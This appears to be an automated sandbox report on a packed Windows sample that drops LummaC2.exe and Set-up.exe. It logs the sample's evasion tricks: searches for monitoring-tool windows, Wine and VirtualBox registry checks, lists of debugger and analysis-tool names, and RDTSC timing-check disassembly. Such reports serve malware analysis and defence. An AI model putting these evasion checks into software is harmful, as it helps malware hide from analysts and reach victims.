Unpacked PE file: 0.2.3stIhG821a.exe.570000.0.unpack :EW;.rsrc:W;.idata :W; :EW;upduborm:EW;fwbmyxqy:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 3stIhG821a.exe	Static PE information: real checksum: 0x5f826f should be: 0x5edfb3
Source: LummaC2.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x4fec3

Source: 3stIhG821a.exe	Static PE information: section name:
Source: 3stIhG821a.exe	Static PE information: section name: .idata
Source: 3stIhG821a.exe	Static PE information: section name:
Source: 3stIhG821a.exe	Static PE information: section name: upduborm
Source: 3stIhG821a.exe	Static PE information: section name: fwbmyxqy
Source: 3stIhG821a.exe	Static PE information: section name: .taggant
Source: Set-up.exe.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FD0F0 push eax; mov dword ptr [esp], 03020130h	1_2_009FD0F1
Source: C:\Users\user\AppData\Local\Temp\LummaC2.exe	Code function: 1_2_009FA480 push eax; mov dword ptr [esp], C9D6D7D4h	1_2_009FA48E
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F502DC push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F502DC push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F5012B push edi; ret	2_3_00F50171
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F5012B push edi; ret	2_3_00F50171
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F50203 push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F50203 push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F502DC push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F502DC push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F56170 push edi; iretd	2_3_00F56171
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F54178 push esi; retf	2_3_00F54179
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F54148 push eax; retf	2_3_00F54149
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F5012B push edi; ret	2_3_00F50171
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F5012B push edi; ret	2_3_00F50171
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F50203 push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F50203 push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F502DC push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F502DC push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F56170 push edi; iretd	2_3_00F56171
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F54178 push esi; retf	2_3_00F54179
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F54148 push eax; retf	2_3_00F54149
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F5012B push edi; ret	2_3_00F50171
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F5012B push edi; ret	2_3_00F50171
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F50203 push es; ret	2_3_00F503F9
Source: C:\Users\user\AppData\Local\Temp\Set-up.exe	Code function: 2_3_00F50203 push es; ret	2_3_00F503F9

Source: 3stIhG821a.exe

Static PE information: section name: upduborm entropy: 7.953488719166442

Source: C:\Users\user\Desktop\3stIhG821a.exe	File created: C:\Users\user\AppData\Local\Temp\Set-up.exe			Jump to dropped file
Source: C:\Users\user\Desktop\3stIhG821a.exe	File created: C:\Users\user\AppData\Local\Temp\LummaC2.exe			Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\3stIhG821a.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\3stIhG821a.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\3stIhG821a.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: PROCMON.EXE
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: X64DBG.EXE
Source: 3stIhG821a.exe	Binary or memory string: SBIEDLL.DLL
Source: 3stIhG821a.exe, 00000000.00000003.1727950224.0000000005450000.00000004.00001000.00020000.00000000.sdmp, 3stIhG821a.exe, 00000000.00000002.1768675449.0000000000572000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SBIEDLL.DLLN@
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WINDBG.EXE
Source: Set-up.exe.0.dr	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: 3stIhG821a.exe, 00000000.00000002.1779450200.00000000073DF000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, Set-up.exe, 00000002.00000000.1735260344.00000000014BB000.00000002.00000001.01000000.00000008.sdmp, Set-up.exe.0.dr	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD03BD second address: DD03CC instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0E8BCBF66h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD03CC second address: DD03D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB0E8BCBD06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD229F second address: DD22B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBF73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD22B6 second address: DD2326 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0E8BCBD11h 0x00000008 jns 00007FB0E8BCBD06h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FB0E8BCBD08h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c je 00007FB0E8BCBD12h 0x00000032 jnl 00007FB0E8BCBD0Ch 0x00000038 add esi, dword ptr [ebp+122D3CB8h] 0x0000003e push 00000000h 0x00000040 sub ecx, 42B12D70h 0x00000046 mov di, 3D9Bh 0x0000004a call 00007FB0E8BCBD09h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD2326 second address: DD232C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD232C second address: DD2331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD2538 second address: DD253C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD253C second address: DD259F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB0E8BCBD18h 0x0000000b popad 0x0000000c nop 0x0000000d mov ecx, edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FB0E8BCBD08h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D301Ch], eax 0x00000031 push 5FEB6179h 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FB0E8BCBD16h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD259F second address: DD2634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FB0E8BCBF6Dh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 5FEB61F9h 0x00000012 mov ecx, edi 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FB0E8BCBF68h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Dh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov ecx, 0AAB0EB9h 0x00000035 pushad 0x00000036 push edi 0x00000037 mov dword ptr [ebp+122D1F63h], edi 0x0000003d pop ebx 0x0000003e mov ecx, eax 0x00000040 popad 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push ebx 0x00000046 call 00007FB0E8BCBF68h 0x0000004b pop ebx 0x0000004c mov dword ptr [esp+04h], ebx 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc ebx 0x00000059 push ebx 0x0000005a ret 0x0000005b pop ebx 0x0000005c ret 0x0000005d jng 00007FB0E8BCBF6Ah 0x00000063 mov dx, 9253h 0x00000067 push 00000003h 0x00000069 stc 0x0000006a push 989E4F00h 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 jng 00007FB0E8BCBF66h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD2634 second address: DD2642 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB0E8BCBD0Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD2642 second address: DD2697 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xor dword ptr [esp], 589E4F00h 0x0000000c jmp 00007FB0E8BCBF73h 0x00000011 lea ebx, dword ptr [ebp+124581DAh] 0x00000017 ja 00007FB0E8BCBF6Ch 0x0000001d movsx ecx, ax 0x00000020 push eax 0x00000021 pushad 0x00000022 pushad 0x00000023 jmp 00007FB0E8BCBF77h 0x00000028 push edi 0x00000029 pop edi 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d push edx 0x0000002e pop edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD2714 second address: DD2728 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0E8BCBD10h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD280F second address: DD282F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB0E8BCBF77h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DD282F second address: DD2839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FB0E8BCBD06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF2ACA second address: DF2ADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB0E8BCBF6Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF0A20 second address: DF0A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF0A24 second address: DF0A32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FB0E8BCBF7Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF0D03 second address: DF0D10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push edi 0x00000009 pop edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF119E second address: DF11A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF147B second address: DF1484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF1484 second address: DF1488 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF1A4E second address: DF1A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF1A54 second address: DF1A5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF1A5C second address: DF1A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF1A65 second address: DF1A6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF1A6B second address: DF1A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DE7C92 second address: DE7CA5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB0E8BCBF6Eh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF21C7 second address: DF21CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF21CB second address: DF21D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FB0E8BCBF66h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF21D9 second address: DF21F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0E8BCBD18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF21F5 second address: DF21FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF21FA second address: DF2206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF24B9 second address: DF24C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF24C3 second address: DF24C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF24C7 second address: DF24E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB0E8BCBF79h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF2650 second address: DF266F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB0E8BCBD18h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF266F second address: DF2674 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF2674 second address: DF267F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF2942 second address: DF2969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB0E8BCBF6Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FB0E8BCBF75h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF2969 second address: DF2978 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007FB0E8BCBD06h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DBB3B1 second address: DBB3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DBB3B7 second address: DBB3BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DBB3BB second address: DBB3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jc 00007FB0E8BCBF6Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF630B second address: DF631F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB0E8BCBD06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007FB0E8BCBD0Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF631F second address: DF6341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB0E8BCBF76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF6341 second address: DF6345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF84E7 second address: DF84ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF84ED second address: DF84FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF84FB second address: DF8500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF8500 second address: DF8505 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF88E0 second address: DF88FB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB0E8BCBF72h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF8B72 second address: DF8B88 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FB0E8BCBD0Ch 0x00000010 jns 00007FB0E8BCBD06h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF8B88 second address: DF8BAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0E8BCBF71h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF8BAA second address: DF8BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: DF8BAE second address: DF8BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\3stIhG821a.exe	RDTSC instruction interceptor: First address: E00A3D second address: E00A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007FB0E8BCBD18h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jo 00007FB0E8BCBD28h 0x00000017 jg 00007FB0E8BCBD0Eh 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f jne 00007FB0E8BCBD06h 0x00000025 pushad 0x00000026 jmp 00007FB0E8BCBD0Ch 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
